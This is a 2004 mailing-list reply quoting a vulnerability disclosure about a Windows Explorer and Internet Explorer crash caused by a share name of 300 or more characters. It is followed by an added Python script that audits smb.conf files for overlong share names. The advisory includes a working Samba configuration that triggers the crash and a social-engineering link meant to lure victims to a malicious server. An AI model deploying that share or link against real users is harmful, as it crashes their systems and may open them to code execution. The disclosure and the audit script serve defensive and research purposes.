Date: Mon, 26 Apr 2004 15:55:55 -0500 (CDT)
From: Daniel Regalado Arias <dan57170@...oo.com>
To: Rodrigo Gutierrez <rodrigo@...ellicomp.cl>, full-disclosure@...ts.netsys.com, bugtraq@...urityfocus.com, submissions@...ketstormsecurity.org, info@...uriteam.com
Subject: Re: Microsoft's Explorer and Internet Explorer long share name buffer overflow.

Well, I have tested it in W2k with SP3 and Explorer didn't crash!!!!!!!
Well, I can't get into the share because a message appears saying "share name not found"!!!! But Explorer is OK.

--- Rodrigo Gutierrez <rodrigo@...ellicomp.cl> wrote:

> Sunday afternoon is a bit boring, and the weather sucks down here in Santiago, Chile, so here we go...
> The vuln is attached in TXT format; I would be grateful if someone could verify if it affects Windows 2003 as well.
>
> Rodrigo.-
>
> Microsoft Explorer and Internet Explorer Long Share Name Buffer Overflow.
>
> Author: Rodrigo Gutierrez <rodrigo@...ellicomp.cl>
>
> Affected: MS Internet Explorer, MS Explorer (explorer.exe)
>           Windows XP (All), Windows 2000 (All)
>
> Not Tested: Windows 2003, Windows Me, Windows 98, Windows 95
>
> Vendor Status: I notified the vendor in the beginning of 2002; this vulnerability was supposed to be fixed in XP Service Pack 1 according to the vendor's knowledge base article 322857.
>
> Vendor URL: http://support.microsoft.com/default.aspx?scid=kb;en-us;322857
>
> Background.
>
> MS Explorer (explorer.exe) and MS Internet Explorer (IEXPLORE.EXE) are core pieces of Microsoft Windows operating systems.
>
> Description
>
> Windows fails to handle long share names when accessing remote file servers such as Samba, allowing a malicious server to crash the client's Explorer and eventually execute arbitrary code on the machine as the current user (usually with Administrator rights on Windows machines).
>
> Analysis
>
> In order to exploit this, an attacker must be able to get a user to connect to a malicious server which contains a share name equal to or longer than 300 characters. Windows won't allow you to create such a share, but of course Samba includes the feature ;). After your Samba box is up and running, create a share in your smb.conf:
>
> #------------ CUT HERE -------------
>
> [AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA]
> comment = Area 51
> path = /tmp/testfolder
> public = yes
> writable = yes
> printable = no
> browseable = yes
> write list = @trymywingchung
>
> #------------ CUT HERE -------------
>
> After your server is up, just get to your Windows test box and go to the Start menu > Run > \\your.malicious.server.ip., plufff, Explorer will crash :).
>
> Social Engineering:
>
> <a href="\\my.malicious.server.ip">Enter My 0day sploit archive</a>
>
> Workaround.
>
> From your network card settings, disable the Client for Microsoft Networks until a real fix for this vulnerability is available.
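The advisory above turns on a single detail: Samba will happily serve a share whose name is far longer than Windows itself permits, and legacy Windows clients fail when they encounter one. An administrator who runs Samba can audit for that condition before a client ever trips over it. The following is an added example, not code from the original post or from Samba; it parses smb.conf sections and flags share names over a length limit. The 80-character limit is an assumption (it is the documented Windows share name maximum, but it is not stated anywhere in the post), and the sample configuration is constructed here to mirror the shape of the advisory's share, not copied from it.

```python
"""Audit an smb.conf for share names longer than Windows clients accept.

Added example (not from the original post). It assumes an 80-character
share name limit (the documented Windows maximum); the 300-character
figure in the advisory is the crash trigger, so anything above the
Windows limit is treated as a misconfiguration worth reporting.
"""
import re

# Assumed limit: Windows refuses to create share names longer than this.
MAX_SHARE_NAME_LEN = 80

# Samba's [global] section holds server settings, not a share.
SPECIAL_SECTIONS = {"global"}

_SECTION_RE = re.compile(r"^\s*\[(?P<name>[^\]]*)\]\s*$")


def parse_shares(conf_text):
    """Return a list of (share_name, {key: value}) tuples from smb.conf text.

    Skips blank lines and '#' / ';' comment lines, collects 'key = value'
    parameters under the current section, and leaves out [global].
    Line continuations with a trailing backslash are not handled.
    """
    shares = []
    current = None
    for raw in conf_text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", ";")):
            continue
        match = _SECTION_RE.match(line)
        if match:
            name = match.group("name").strip()
            current = (name, {})
            if name.lower() not in SPECIAL_SECTIONS:
                shares.append(current)
            continue
        if current is not None and "=" in line:
            key, _, value = line.partition("=")
            current[1][key.strip().lower()] = value.strip()
    return shares


def find_overlong_shares(conf_text, limit=MAX_SHARE_NAME_LEN):
    """Return [(share_name, length)] for every share name longer than `limit`."""
    return [(name, len(name))
            for name, _ in parse_shares(conf_text)
            if len(name) > limit]


# Constructed sample config: one ordinary share plus one whose name is
# built to 300 characters, the length the advisory describes.
SAMPLE_CONF = """
[global]
workgroup = WORKGROUP

; an ordinary share that should pass the check
[public]
path = /srv/public
browseable = yes

# share name built to exceed the Windows limit
[{}]
comment = Area 51
path = /tmp/testfolder
browseable = yes
""".format("A" * 300)


if __name__ == "__main__":
    for name, length in find_overlong_shares(SAMPLE_CONF):
        print("overlong share name (%d chars, limit %d): %s..."
              % (length, MAX_SHARE_NAME_LEN, name[:20]))
```

Run it against a real smb.conf by reading the file into `find_overlong_shares`; a non-empty result means the server is advertising a share that Windows could never have created locally, which is exactly the case the advisory describes. The threshold is a parameter so it can be tightened to whatever a site's naming policy requires.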